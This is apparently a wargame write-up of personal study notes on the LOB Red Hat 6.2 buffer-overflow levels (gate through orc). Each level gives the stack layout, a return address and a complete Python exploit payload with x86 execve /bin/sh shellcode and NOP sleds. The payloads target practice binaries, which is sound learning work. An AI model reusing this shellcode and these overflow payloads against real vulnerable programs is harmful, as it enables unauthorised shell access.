Wargames

LOB Redhat 6.2 - orc
orc - egghunter + buffer hunter
Stack : i[4] + buffer[40] + sfp[4] + ret[4]
return address : 0xbffffc44
Payload : ./wolfman `python -c 'print "\x90"*21 + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" + "\x44\xfc\xff\xbf"'`
Using argv[1] address

LOB Redhat 6.2 - goblin
goblin - egghunter
Stack : i[4] + buffer[40] + sfp[4] + ret[4]
return address : 0xbffffc01
Payload : ./orc `python -c 'print "A"*44 + "\x01\xfc\xff\xbf"'` `python -c 'print "\x90"*100 + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`
Using buffer address

LOB Redhat 6.2 - cobolt
cobolt - small buffer + stdin
Stack : buffer[16] + sfp[4] + ret[4]
return address : 0xbffffeb9
Payload : (python -c 'print "A"*20 + "\xb9\xfe\xff\xbf"';cat) | ./goblin
Environment Variable : export shell=`python -c 'print "\x90"*100 + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`
getenv.c :
Using Environment Variable

LOB Redhat 6.2 - gremlin
*Please note that this post is by no means a tutorial; it is a write-up of notes on what I have studied.
gremlin - small buffer
Stack : buffer[16] + sfp[4] + ret[4]
return address : 0xbffffbee
Payload : ./cobolt `python -c 'print "A"*20 + "\xee\xfb\xff\xbf" + "\x90"*100 + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`
Using argv[1] address

LOB Redhat 6.2 - gate
gate - simple BOF
Stack : buffer[256] + sfp[4] + ret[4]
return address : 0xbffff928
Payload : ./gremlin `python -c 'print "\x90"*137 + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" + "\x90"*100 + "\x28\xf9\xff\xbf"'`
Using buffer address

Easy Unpack - 100pt: This post is protected.
Easy Keygen - 100pt: This post is protected.
Easy Crack - 100pt: This post is protected.